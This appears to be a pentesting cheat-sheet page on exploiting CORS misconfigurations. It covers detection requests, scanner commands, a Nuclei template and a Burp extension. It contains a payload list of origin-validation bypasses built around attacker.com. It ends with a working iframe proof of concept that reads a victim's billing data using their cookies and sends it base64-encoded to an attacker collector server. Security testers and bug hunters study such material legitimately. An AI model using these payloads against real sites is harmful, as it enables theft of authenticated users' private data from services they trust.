CORS

Cross Origin Resource Sharing misconfiguration exploits

What is CORS (cross-origin resource sharing)? Tutorial & Examples | Web Security AcademyWebSecAcademy

A CORS policy allows developers to selectively relax SOP restrictions and allow controlled cross-origin requests. It's a browser security policy that's declared through the Access-Control-Allow-Origin and Access-Control-Allow-Credentials response headers.

CORS Misconfiguration

Detection

Send a request with a likely trusted origin in the Origin: request header and examine the response for any CORS policy reflections.

GET /api/v1/account/ HTTP/2
Host: domain.com
Cookie: session=v77QFGNrzt4upa4W0SuxLFMCOKmEibNo
Accept-Encoding: gzip, deflate
Origin: https://test.com

HTTP/2 200 OK
Access-Control-Allow-Origin: https://test.com
Access-Control-Allow-Credentials: true
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 149

{“data”:”data”}

Scanner

GitHub - chenjj/CORScanner: 🎯 Fast CORS misconfiguration vulnerabilities scannerGitHub

GitHub - s0md3v/Corsy: CORS Misconfiguration ScannerGitHub

$ Corsy -u https://target.com

$ corsy -i ./targets.txt

Nuclei template

https://github.com/coffinxp/priv8-Nuclei/blob/main/cors.yaml

id: cors-misconfig
info:
  name: CORS Misconfiguration
  author: coffin
  severity: high
  tags: cors,generic,misconfig

http:
  - raw:
      - |
        GET  HTTP/1.1
        Host: {{Hostname}}
        Origin: {{cors_origin}}

    payloads:
      cors_origin:
        - "https://{{tolower(rand_base(5))}}.{{RDN}}" # Find domain in RDN with Misconfiguration
    stop-at-first-match: true
    matchers:
      - type: dsl
        name: arbitrary-origin
        dsl:
          - "contains(tolower(header), 'access-control-allow-origin: {{cors_origin}}')"
          - "contains(tolower(header), 'access-control-allow-credentials: true')"
        condition: and

https://github.com/coffinxp/CorsExploit/blob/main/cors.yamlgithub.com

Burp Extension

CORS*, Additional CORS Checksportswigger.net

To use this extension, simply click on the “Activate CORS* checkbox” and browse your target to let the extension do its magic. It will attempt different CORS bypass techniques for all requests passing through your Burp proxy. All you need to do is to check the results.

URL Validation Bypass

URL validation bypass cheat sheet for SSRF/CORS/Redirect - 2024 Edition | Web Security AcademyWebSecAcademy

Bypassing weak regex pattern validations

# Basic payload list
*                                             # Non-exploitable case
null
https://attacker.com

# More advanced list
https://example.comattacker.com
https://example.com.attacker.com
https://example.computer
https://attacker.comexample.com
https://examplecom
https://localhostexample.com                  # In case 'localhost' is whitelisted
https://subdomain-takeover.example.com        # In case of a subdomain takeover

# Special characters (browser-specific payloads)
https://example.com%attacker.com              # Requires setting up a wildcard so that all subdomains resolve for attacker.com
https://example.com@attacker.com              # Requires setting up a wildcard so that all subdomains resolve for attacker.com
https://example.com`.attacker.com             # Safari-only - Requires setting up a wildcard so that all subdomains resolve for attacker.com

Null Access-Control-Allow-Origin

Payload: Use a sandboxed iframe with allow-scripts and srcdoc to execute a script that:

Sends a request to https://api.example.com/api/account/billing including the user's cookies (credentials: 'include').
Reads the response, encodes it in base64, and sends it to a malicious server at http://attacker-server/collector.

<!-- CORS proof of concept payload that creates a sandboxed iframe -->
<iframe sandbox="allow-scripts" srcdoc="
  <script>
    fetch('https://api.example.com/api/account/billing', {
      credentials: 'include'  // Include cookies
    }).then(async (data) => {
      // Forward response to your controlled server (in base64)
      fetch('http://attacker-server/collector?data=' + btoa(await data.text()));
    });
  </script>
">
</iframe>

Resources

CORS Misconfigurations: Advanced Exploitation GuideIntigriti

Understanding and Preventing CORS MisconfigurationVAADATA - Ethical Hacking Services

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

The Web Application Hacker’s Handbook The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more
Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them
Real-World Bug Hunting: A Field Guide to Web Hacking Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

PreviousCSRF NextOpen Redirection

Last updated 6 months ago